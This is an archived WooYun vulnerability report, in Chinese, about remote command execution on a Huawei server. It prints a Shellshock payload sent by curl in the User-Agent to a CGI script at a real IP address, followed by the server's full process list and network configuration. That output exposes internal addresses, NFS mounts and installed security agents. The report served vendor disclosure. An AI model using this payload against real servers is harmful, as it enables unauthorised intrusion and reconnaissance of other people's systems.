乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-05-10: 细节已通知厂商并且等待厂商处理中 2015-05-10: 厂商已经确认,细节仅向厂商公开 2015-05-20: 细节向核心白帽子及相关领域专家公开 2015-05-30: 细节向普通白帽子公开 2015-06-09: 细节向实习白帽子公开 2015-06-24: 细节向公众公开
华为某服务器存在远程命令执行漏洞
curl http://122.11.38.69:8082/cgi-bin/test-cgi -A "() { foo;};echo;/bin/ps -ef" -k
UID PID PPID C STIME TTY TIME CMDroot 1 0 0 2012 ? 00:10:41 init [3] root 2 0 0 2012 ? 00:00:00 [kthreadd]root 3 2 0 2012 ? 00:00:35 [migration/0]root 4 2 0 2012 ? 00:02:56 [ksoftirqd/0]root 5 2 0 2012 ? 00:21:44 [events/0]root 6 2 0 2012 ? 00:00:00 [cpuset]root 7 2 0 2012 ? 00:00:00 [khelper]root 8 2 0 2012 ? 00:00:00 [netns]root 9 2 0 2012 ? 00:00:00 [async/mgr]root 10 2 0 2012 ? 00:00:00 [pm]root 11 2 0 2012 ? 00:00:00 [xenwatch]root 12 2 0 2012 ? 00:00:00 [xenbus]root 14 2 0 2012 ? 00:00:54 [migration/1]root 15 2 0 2012 ? 00:01:11 [ksoftirqd/1]root 16 2 0 2012 ? 00:22:34 [events/1]root 17 2 0 2012 ? 00:00:50 [migration/2]root 18 2 0 2012 ? 00:01:30 [ksoftirqd/2]root 19 2 0 2012 ? 00:27:36 [events/2]root 20 2 0 2012 ? 00:00:44 [migration/3]root 21 2 0 2012 ? 00:00:56 [ksoftirqd/3]root 22 2 0 2012 ? 01:27:20 [events/3]root 23 2 0 2012 ? 00:01:27 [sync_supers]root 24 2 0 2012 ? 00:01:42 [bdi-default]root 25 2 0 2012 ? 00:00:00 [kintegrityd/0]root 26 2 0 2012 ? 00:00:00 [kintegrityd/1]root 27 2 0 2012 ? 00:00:00 [kintegrityd/2]root 28 2 0 2012 ? 00:00:00 [kintegrityd/3]root 29 2 0 2012 ? 00:00:00 [kblockd/0]root 30 2 0 2012 ? 00:00:00 [kblockd/1]root 31 2 0 2012 ? 00:00:00 [kblockd/2]root 32 2 0 2012 ? 00:00:00 [kblockd/3]root 33 2 0 2012 ? 00:00:00 [kseriod]root 38 2 0 2012 ? 00:00:00 [khungtaskd]root 39 2 0 2012 ? 00:00:00 [kswapd0]root 40 2 0 2012 ? 00:00:00 [aio/0]root 41 2 0 2012 ? 00:00:00 [aio/1]root 42 2 0 2012 ? 00:00:00 [aio/2]root 43 2 0 2012 ? 00:00:00 [aio/3]root 44 2 0 2012 ? 00:00:00 [crypto/0]root 45 2 0 2012 ? 00:00:00 [crypto/1]root 46 2 0 2012 ? 00:00:00 [crypto/2]root 47 2 0 2012 ? 00:00:00 [crypto/3]root 49 2 0 2012 ? 00:00:00 [kpsmoused]root 50 2 0 2012 ? 00:00:00 [xenfb thread]root 153 2 0 2012 ? 00:00:00 [net_accel/0]root 154 2 0 2012 ? 00:00:00 [net_accel/1]root 155 2 0 2012 ? 00:00:00 [net_accel/2]root 156 2 0 2012 ? 00:00:00 [net_accel/3]root 459 2 0 2012 ? 00:03:43 [kjournald]root 530 1 0 2012 ? 00:00:00 /sbin/udevd --daemonroot 865 2 0 2012 ? 00:00:00 [kstriped]root 949 2 0 2012 ? 00:05:57 [kjournald]100 1389 1 0 2012 ? 00:01:37 /bin/dbus-daemon --system101 1460 1 0 2012 ? 00:00:26 /usr/sbin/hald --daemon=yesroot 1463 1 0 2012 ? 00:00:24 /usr/sbin/console-kit-daemonroot 1526 1460 0 2012 ? 00:00:00 hald-runnerroot 3290 1 0 2013 ? 00:00:00 bash -c umount -l /opt/huawei/ttgo/file/fileup ; umount -l /opt/huawei/ttgo/fileroot 3314 3290 0 2013 ? 00:00:15 umount -l /opt/huawei/ttgo/file/fileuproot 3320 1 0 2013 ? 00:00:13 df -hroot 3369 1 0 2013 ? 00:00:00 bash -c umount -l /opt/huawei/ttgo/file/fileup ; umount -l /opt/huawei/ttgo/fileroot 3393 3369 0 2013 ? 00:00:00 umount -l /opt/huawei/ttgo/file/fileuproot 3565 1 0 2013 ? 00:00:00 sh /etc/init.d/boot.localroot 3590 3565 0 2013 ? 00:00:00 mount 10.11.121.206:/opt/huawei/FileData_RAID10 /opt/huawei/ttgo/file/root 3591 3590 0 2013 ? 00:00:00 /sbin/mount.nfs 10.11.121.206:/opt/huawei/FileData_RAID10 /opt/huawei/ttgo/file/ -o rwroot 3689 1 0 2012 ? 00:00:30 /sbin/auditd -s disableroot 3691 3689 0 2012 ? 00:01:15 /sbin/audispdroot 3692 2 0 2012 ? 00:00:00 [kauditd]root 3713 1 0 2012 ? 00:01:09 /sbin/rpcbindroot 3929 1 0 2012 ? 00:00:00 /usr/sbin/sshd -o PidFile=/var/run/sshd.init.pidroot 3968 1 0 2012 ? 02:02:08 /usr/sbin/irqbalanceroot 3981 1 0 2012 ? 00:08:10 /usr/sbin/nscdroot 4011 1 0 2012 ? 00:09:24 /usr/sbin/cronroot 4026 1 0 2012 tty1 00:00:00 /sbin/mingetty --noclear tty1root 4027 1 0 2012 tty2 00:00:00 /sbin/mingetty tty2root 4028 1 0 2012 tty3 00:00:00 /sbin/mingetty tty3root 4029 1 0 2012 tty4 00:00:00 /sbin/mingetty tty4root 4030 1 0 2012 tty5 00:00:00 /sbin/mingetty tty5root 4031 1 0 2012 tty6 00:00:00 /sbin/mingetty tty6ttgo 6092 1 0 2014 ? 21:53:16 /opt/huawei/ttgo/push/jdk/bin/java -Djava.util.logging.config.file=/opt/huawei/ttgo/push/tomcat/conf/logging.properties -Djava.util.logging.manager=org.apache.juli.ClassLoaderLogManager -Djava.endorsed.dirs=/opt/huawei/ttgo/push/tomcat/endorsed -classpath /opt/huawei/ttgo/push/tomcat/bin/bootstrap.jar:/opt/huawei/ttgo/push/tomcat/bin/tomcat-juli.jar -Dcatalina.base=/opt/huawei/ttgo/push/tomcat -Dcatalina.home=/opt/huawei/ttgo/push/tomcat -Djava.io.tmpdir=/opt/huawei/ttgo/push/tomcat/temp org.apache.catalina.startup.Bootstrap startroot 7944 2 0 2012 ? 00:00:08 [rpciod/0]root 7945 2 0 2012 ? 00:00:01 [rpciod/1]root 7946 2 0 2012 ? 00:00:01 [rpciod/2]root 7947 2 0 2012 ? 00:00:00 [rpciod/3]root 7951 2 0 2012 ? 00:00:00 [kslowd000]root 7952 2 0 2012 ? 00:00:00 [kslowd001]root 7955 2 0 2012 ? 00:00:00 [nfsiod]root 10152 2 0 2012 ? 00:00:04 [kjournald]root 10836 1 0 2014 ? 00:02:02 /sbin/syslog-ngroot 10839 1 0 2014 ? 00:00:00 /sbin/klogd -c 1 -xttgo 11297 11463 0 17:51 ? 00:00:00 /opt/huawei/ttgo/push/cloudServer/apache/bin/httpd -k start -f /opt/huawei/ttgo/push/cloudServer/apache/conf/httpd.confttgo 11463 1 0 2012 ? 01:56:36 /opt/huawei/ttgo/push/cloudServer/apache/bin/httpd -k start -f /opt/huawei/ttgo/push/cloudServer/apache/conf/httpd.confttgo 11466 11463 0 2012 ? 00:00:00 /opt/huawei/ttgo/push/cloudServer/apache/bin/httpd -k start -f /opt/huawei/ttgo/push/cloudServer/apache/conf/httpd.confroot 12243 2 0 18:48 ? 00:00:00 [flush-202:16]ttgo 12249 11466 0 18:48 ? 00:00:00 /bin/sh /opt/huawei/ttgo/push/cloudServer/apache/cgi-bin/test-cgittgo 12250 12249 0 18:48 ? 00:00:00 /bin/ps -efroot 16017 1 0 2012 ? 00:00:00 rpc.statd --no-notifyroot 16026 2 0 2012 ? 00:00:00 [lockd]zabbix 21920 1 0 2013 ? 00:00:00 /opt/zabbix/sbin/zabbix_agentdzabbix 21921 21920 0 2013 ? 11:56:03 /opt/zabbix/sbin/zabbix_agentdzabbix 21922 21920 0 2013 ? 00:24:17 /opt/zabbix/sbin/zabbix_agentdzabbix 21923 21920 0 2013 ? 00:24:17 /opt/zabbix/sbin/zabbix_agentdzabbix 21924 21920 0 2013 ? 00:24:16 /opt/zabbix/sbin/zabbix_agentdzabbix 21925 21920 0 2013 ? 09:52:21 /opt/zabbix/sbin/zabbix_agentdroot 22136 1 0 2012 ? 00:00:00 /sbin/agetty -L 9600 xvc0 xtermroot 22368 2 0 2012 ? 00:10:55 [flush-202:0]ntp 23389 1 0 2012 ? 00:45:34 /usr/sbin/ntpd -p /var/run/ntp/ntpd.pid -g -u ntp:ntp -i /var/lib/ntp -c /etc/ntp.confroot 31936 1 0 2013 ? 00:00:13 /var/ossec/bin/ossec-execdossec 31940 1 0 2013 ? 00:26:07 /var/ossec/bin/ossec-agentdroot 31944 1 0 2013 ? 00:14:32 /var/ossec/bin/ossec-logcollectorroot 31948 1 0 2013 ? 2-04:11:29 /var/ossec/bin/ossec-syscheckd
eth0 Link encap:Ethernet HWaddr 00:16:3E:0B:20:70 inet addr:10.11.32.112 Bcast:10.11.32.255 Mask:255.255.255.0 UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1 RX packets:622434337 errors:0 dropped:0 overruns:0 frame:0 TX packets:405783654 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 RX bytes:51098113331 (48730.9 Mb) TX bytes:32920068898 (31395.0 Mb)lo Link encap:Local Loopback inet addr:127.0.0.1 Mask:255.0.0.0 UP LOOPBACK RUNNING MTU:16436 Metric:1 RX packets:362 errors:0 dropped:0 overruns:0 frame:0 TX packets:362 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 RX bytes:33120 (32.3 Kb) TX bytes:33120 (32.3 Kb)
删除
危害等级:中
漏洞Rank:10
确认时间:2015-05-10 22:38
猪猪侠大名啊。感谢你的提醒。
暂无